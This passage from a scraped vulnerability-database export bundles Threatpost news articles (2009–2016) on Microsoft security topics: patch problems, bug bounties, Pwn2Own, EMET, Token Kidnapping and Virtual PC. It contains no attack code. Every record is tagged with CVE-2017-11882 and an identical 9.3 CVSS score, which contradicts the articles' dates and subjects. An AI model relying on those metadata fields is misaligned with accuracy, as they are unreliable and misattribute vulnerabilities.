have TLS 1.2 enabled in certain configurations and it will sometimes cause processes to hang or become unresponsive from time to time. Microsoft said it\u2019s aware of the issue and is recommending that users who run into the problem disable support for several of the new cipher suites that the MS14-066 patch adds to Windows.\n\n\u201cWe are aware of an issue in certain configurations in which TLS 1.2 is enabled by default, and TLS negotiations may fail. 
When this problem occurs, TLS 1.2 connections are dropped, processes hang (stop responding), or services become intermittently unresponsive,\u201d Microsoft said in a Knowledge Base [article](<https://support.microsoft.com/kb/2992611>).\n\nMicrosoft recommends that affected users remove these four cipher suites, which the update added, from the registry:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nThe MS14-066 patch fixes a vulnerability in every supported version of Windows that involves the way that Schannel handles certain requests. Schannel is the SSL/TLS implementation in Windows and the vulnerability is remotely exploitable.\n\n\u201cA remote code execution vulnerability exists in the [Secure Channel (Schannel)](<https://technet.microsoft.com/en-us/library/security/dn848375.aspx#Schannel>) security package due to the improper processing of specially crafted packets. Microsoft received information about this vulnerability through coordinated vulnerability disclosure. When this security bulletin was issued, Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers. 
The update addresses the vulnerability by correcting how Schannel sanitizes specially crafted packets,\u201d Microsoft said in its [advisory](<https://technet.microsoft.com/library/security/MS14-066>).\n", "cvss3": {}, "published": "2014-11-17T09:30:34", "type": "threatpost", "title": "Issues Arise With MS14-066 Schannel Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T19:54:58", "id": "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "href": "https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. 
We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later, [jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nMicrosoft has been using outside researchers to test its software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. 
The reasoning is that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "CanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. 
Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. 
We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the contest ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to build the strong response processes and engineering discipline that are necessary for our communal security. And as always, the MSRC is ready to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will own many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. 
The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. \n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. 
\u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. Of those, 1,752 (68 percent) secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges a gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reform of ECPA has long been sought by privacy advocates such as the Electronic Privacy Information Center (EPIC). \n\nAlan Butler, senior counsel at EPIC, said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nThe ACLU used Microsoft\u2019s lawsuit as an opportunity to urge Congress to reform the Electronic Communications Privacy Act. \u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU, in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. 
Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), the Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempted to fix the notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. A 2012 report from Texas Southern University\u2019s Thurgood Marshall School of Law, \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimated that magistrate judges approve some 30,000 electronic surveillance orders each year. 
\n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. 
IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within Internet Explorer. It is possible under certain conditions for the invalid flag reference to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.\n\n\u201cAt this time, we are aware of targeted attacks attempting to use this vulnerability. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. 
Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and check its structure against the expected file format. If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit known as a file format attack. 
File format attacks exploit the integrity of a file, and occur when the structure of a file is modified with the intent of adding malicious code. Usually the malicious code is run remotely and is used to elevate the privilege of restricted accounts on the computer. As a result, an attacker could gain access to a computer that was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>). \n\n\u201cThis could enable an attacker to read sensitive information from the computer\u2019s hard disk drive or to install malware, such as a worm or a key logging program. The Office File Validation feature helps prevent file format attacks by scanning and validating files before they are opened. To validate files, Office File Validation compares a file\u2019s structure to a predefined file schema, which is a set of rules that define what a readable file looks like. If Office File Validation detects that a file\u2019s structure does not follow all rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the Windows OS loader that loads the kernel and boot-start drivers. The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on a system. One way we have seen rootkits hide themselves on 64-bit systems is bypassing driver signing checks done by winload.exe. While the update itself won\u2019t remove a rootkit, it will expose an installed rootkit and give your anti-malware software the ability to detect and remove the rootkit,\u201d Microsoft\u2019s Dustin Childs said. 
\n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. 
[Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is seen as a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), because it validates the indirect call targets such exploits typically hijack; use-after-free became a favorite exploit primitive once ASLR and DEP put a damper on classic buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. EMET also required careful per-application configuration; otherwise it could break certain applications.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. 
In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which uses hardware virtualization to isolate applications and untrusted links from the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce said advanced attackers have moved well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>), automating many facets of an attack in ways that EMET\u2019s late-hooking defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. 
If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:23", "description": "Microsoft\u2019s problems with [Token Kidnapping](<http://www.argeniss.com/research/TokenKidnapping.pdf>) [.pdf] on the Windows platform aren\u2019t going away anytime soon.\n\nMore than a year after Microsoft issued a [patch](<http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx>) to cover privilege escalation issues that could lead to complete system takeover, a security researcher plans to use the Black Hat conference spotlight to expose new design mistakes and security issues that can be exploited to elevate privileges on all Windows versions including the brand new Windows 2008 R2 and Windows 7.\n\nCesar Cerrudo, founder and CEO of Argeniss, a security consultancy firm based in Argentina, first reported the token kidnapping hiccup to Microsoft in 2008 and after waiting in vain for a patch, he released the details during the [Month of Kernel Bugs](<http://projects.info-pull.com/mokb/MOKB-06-11-2006.html>) project.\n\nThe flaw would eventually be [exploited in active attacks](<http://www.zdnet.com/blog/security/one-year-old-unpatched-windows-token-kidnapping-under-attack/2894>), leading to a mad scramble at Redmond to come up with a fix and a subsequent [disclosure flap](<http://www.zdnet.com/blog/security/responsible-disclosure-the-microsoft-way/157>) that exposed 
Microsoft as the irresponsible party.\n\nThis year, Cerrudo plans a new talk titled \u201cToken Kidnapping\u2019s Revenge\u201d in which he will discuss how attackers can even bypass certain Windows service protections.\n\nIn an interview with Threatpost, Cerrudo said the presentation will cover about half a dozen vulnerabilities in all Windows versions from XP to Windows 7 that can be exploited to elevate privileges by any user with impersonation rights. \n\nThe explanation:\n\n_Most Windows service accounts have impersonation rights. Because impersonation rights are needed, these are not critical, high-risk vulnerabilities; regular Windows users can\u2019t exploit them. Some applications are more susceptible to exploitation of these vulnerabilities than others. For instance, if you can upload ASP web pages with exploit code to a MS Internet Information Server (IIS) 6, 7 or 7.5 running in default configuration, you will be able to fully compromise the Windows server. _\n\nFor example, if you are an SQL Server administrator (which is not a Windows administrator) you can exploit these vulnerabilities from SQL Server and fully compromise the Windows server. 
\n\nCerrudo said the vulnerabilities can be exploited to bypass the newer Windows service protections, which also helps in post-exploitation scenarios where an attacker is able to run code after exploiting a vulnerability in a Windows service but is not able to compromise the whole system because of those protections.\n\nOne of the issues Cerrudo plans to present at Black Hat even allows him to bypass one of Microsoft\u2019s fixes for previous Token Kidnapping vulnerabilities on Windows 2003.\n\n\u201cMicrosoft is aware of these issues (and another local privilege elevation issue that can be exploited by any user, but I won\u2019t be talking about it before the fix) and they will be releasing fixes and advisories in August,\u201d Cerrudo explained.\n\nThe researcher also plans to release two exploits (called Chimichurri and Churraskito) for IIS and SQL Server. These exploits could work on other services too with some minor modifications, he said.\n\n\u201cThe presentation is not only about the vulnerabilities and the exploits. I will be showing step by step how I found the vulnerabilities, with what tools and techniques, so participants can learn and walk away knowing how to find these kinds of vulnerabilities by themselves,\u201d Cerrudo added.\n", "cvss3": {}, "published": "2010-07-16T15:42:06", "type": "threatpost", "title": "MS Windows Token Kidnapping Problems Resurface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:32", "id": "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "href": "https://threatpost.com/ms-windows-token-kidnapping-problems-resurface-071610/74221/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. 
The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. 
For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. 
This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it. \n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** per se. Instead, they are describing a way for an attacker to more easily exploit security vulnerabilities that must already be present on the system. It\u2019s a subtle point, but one that folks should really understand. The protection mechanisms that are present in the Windows kernel are rendered less effective inside of a virtual machine as opposed to a physical machine. There is no vulnerability introduced, just a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time. \n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine. 
\n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are about the now-exposed (incorrect) assumption that various security mechanisms will always be in place. It\u2019s obvious that a complete re-calibration of exploit potential for uncategorized bugs will become necessary if vulnerabilities like the one described here remain in our fielded systems. Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT. \n\n\u201cIn our view, design and architecture decisions made for Virtual PC completely invalidate some basic assumptions about processes in modern Windows operating systems. Like falling dominoes, this in turn invalidates almost all anti-exploit mechanisms that Microsoft has built into their OS over the past 